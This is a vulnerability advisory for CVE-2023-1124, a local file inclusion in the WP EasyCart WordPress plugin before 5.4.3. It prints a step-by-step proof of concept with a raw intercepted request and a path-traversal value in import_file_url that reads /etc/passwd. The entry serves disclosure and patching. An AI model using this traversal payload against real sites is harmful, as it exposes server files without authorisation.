Lucene search
Shreya PohekarWPEX-ID:229B93CD-544B-4877-8D9F-E6DEBDA9511CHistoryMar 13, 2023 - 12:00 a.m.
Shopping Cart & eCommerce Store < 5.4.3 - Admin+ LFI
2023-03-1300:00:00
Shreya Pohekar
59
admin login
lfi vulnerability
ecommerce store
import products
intercept request
cookie
admin-ajax.php
import_file_url
exploit
0.001 Low
EPSS
Percentile
36.7%
The plugin does not validate HTTP requests, allowing authenticated users with admin privileges to perform LFI attacks.
1. Login as Admin.
2. Go to `wp-admin/admin.php?page=wp-easycart-products&subpage=products`
3. Click on Import Products. Browse any file and click on import file. Intercept the request. It will contain the following:
```
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Cookie: wordpress_b92078c82d0f1044cdfb065e7ae28bec=admin%7C1675522971%; PHPSESSID=qp0lnu3uc71tv3hl6jcgsknnjd; wpeasycart_admin_perpage=25
action=ec_admin_ajax_import_products&import_file_url=http%3A%2F%2F127.0.0.1%2Fwp-content%2Fuploads%2F2023%2F02%2Fresume_xss.png&wp_easycart_nonce=fd850a701e
```
4. Change the value of `import_file_url` to a file (ex: `/../../../../../etc/passwd`)
5. Send the request and you will see that the contents of `/etc/passwd` is obtained
Note: only first line is obtained in the response.Related
prion
prion
Design/Logic Flaw
2023-04-03 15:15:00
cvelist
cvelist
CVE-2023-1124 Shopping Cart & eCommerce Store < 5.4.3 - Admin+ LFI
2023-04-03 14:38:26
nvd
nvd
CVE-2023-1124
2023-04-03 15:15:18
wpvulndb
wpvulndb
Shopping Cart & eCommerce Store < 5.4.3 - Admin+ LFI
2023-03-13 00:00:00
cve
cve
CVE-2023-1124
2023-04-03 15:15:18
wordfence
wordfence